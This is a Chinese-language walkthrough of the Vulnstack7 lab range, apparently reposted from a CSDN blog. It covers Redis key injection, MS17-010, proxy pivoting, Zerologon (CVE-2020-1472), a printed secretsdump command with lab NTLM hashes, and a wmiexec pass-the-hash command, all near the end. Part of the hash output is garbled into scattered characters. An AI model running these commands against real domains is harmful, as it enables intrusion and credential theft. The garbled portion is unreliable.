vulnstack7 writeup
作者:互联网
环境配置
靶场http://vulnstack.qiyuanxuetang.net/vuln/detail/9/
WEB1(ubuntu):
双网卡
192.168.1.15
192.168.52.10
PC1:
双网卡
192.168.52.30
192.168.93.20
WEB2(ubuntu):
双网卡
192.168.52.20
192.168.93.10
PC2:
192.168.93.40
域控:
192.168.93.30
开始打靶
扫描端口发现redis
redis未授权,使用工具进行图形化写入公钥
https://github.com/qishibo/AnotherRedisDesktopManager/releases/tag/v1.5.1
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZQhaT7Rn-1644300498228)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/0b6c0eb7-7bd7-464e-b5fc-e84e2cd8893e/Untitled.png)]](https://www.icode9.com/i/ll/?i=89083183fe734fd5977e46c7e923a255.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
用kali进行连接,成功获取root权限并且发现网段192.168.52.10
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6gA55hhk-1644300498229)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a265845d-a8e3-4306-bee2-359c5aad36b4/Untitled.png)]](https://www.icode9.com/i/ll/?i=6a0fd4470fb5454cb805765e9d5694ac.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GlfFDAdg-1644300498230)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/723443c1-f766-4c43-9ca3-93e439c3ad24/Untitled.png)]](https://www.icode9.com/i/ll/?i=e132ae0e2ece4334a2fe89950d537e26.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
用msf上传fscan对192.168.52.0/24进行扫描
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p73ti4In-1644300498230)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/5abfe406-ef9f-4b40-bd07-cdf047c0630c/Untitled.png)]](https://www.icode9.com/i/ll/?i=87d51dbe768d4aaab1e01e8f35d708a3.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
发现192.168.52.30存在通达oa以及ms17010
192.168.52.20:8000 为Laravel
192.168.52.10:81 端口也为Laravel,推测为nginx的反向代理
先搞192.168.52.30
在主机192.168.52.10上 做frp代理
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-meQP69LR-1644300498231)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/c1ebe81a-429a-4e86-a1aa-f1ed36814a20/Untitled.png)]](https://www.icode9.com/i/ll/?i=2cde227e0caa4ad9817e0e3c6345711a.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
测试下代理,没有问题
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lJ7CdBF9-1644300498232)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a4c53deb-86fc-413c-8382-cbae4ad6d687/Untitled.png)]](https://www.icode9.com/i/ll/?i=2af5dfcd289e404781d1144864420167.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
两个方向:
1、通达oa漏洞
这个直接在windows上搞
访问http://192.168.52.30:8080/,利用通达oa任意用户登录进入后台
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OtLAQlDl-1644300498232)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/451cf7ec-17e4-44b7-94c9-d276d3a9fa15/Untitled.png)]](https://www.icode9.com/i/ll/?i=24177746c67743c4b387e93418dcc97e.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
进入后台发现试用期过了,尬住了
这条线先放下,搞ms17010
2、MS17010
用kali proxychains走代理
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BLaVJa0B-1644300498234)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8348882b-aed8-4cb0-9b98-1b9fb7d999c1/Untitled.png)]](https://www.icode9.com/i/ll/?i=a1414f64d3f148e68a3488699c971815.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
成功获取win7主机权限
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gA3l9GYA-1644300498235)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/b2b88e8c-e73f-411d-b1fe-d7d8e2a6f9af/Untitled.png)]](https://www.icode9.com/i/ll/?i=34c01ec8432345098a7d97bd3510fdb9.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
发现双网卡,通192.168.93.0/24,发现域whoamianony.org
然后发现msf有点玩不明白,因为主机出网,换cs
获取域用户账号密码
横向发现192.168.93.30,40
确定域控为192.168.93.30,40为域内另一台主机,存在ms17010
用20做代理,先打一下40
成功获取主机权限,但发现其不出网,所以用20做中转上线cs
下一步打域控,用到漏洞CVE-2020-1472
利用工具地址
https://github.com/VoidSec/CVE-2020-1472
python3 secretsdump.py whoamianony/DC\$@192.168.83.30 -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6be58bfcc0a164af2408d1d3bd313c2a:::
whoami:1001:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
whoamianony.org\bunny:1112:aad3b435b51404eeaad3b435b51404ee:cc567d5556030b7356ee4915ff098c8f:::
whoamianony.org\moretz:1115:aad3b435b51404eeaad3b435b51404ee:ba6723567ac2ca8993b098224ac27d90:::
DC
:
1002
:
a
a
d
3
b
435
b
51404
e
e
a
a
d
3
b
435
b
51404
e
e
:
31
d
6
c
f
e
0
d
16
a
e
931
b
73
c
59
d
7
e
0
c
089
c
0
:
:
:
P
C
2
:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: PC2
:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::PC2:1113:aad3b435b51404eeaad3b435b51404ee:cda321ff9d86cdce7e989cef83ef9f3a:::
proxychains wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec whoamianony/administrator@192.168.93.30
获取域控权限
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VGBywDzy-1644300498252)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/bf9f7bdd-2c3f-4b35-86d9-d3cc6204c44f/Untitled.png)]](https://www.icode9.com/i/ll/?i=676eb2b1025c4636ad27c36e46b1eedc.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rSB6Zyy5Y2h,size_20,color_FFFFFF,t_70,g_se,x_16)
标签:whoamianony,writeup,52.10,vulnstack7,52.30,192.168,aad3b435b51404eeaad3b435b5140 来源: https://blog.csdn.net/qq_39510388/article/details/122822826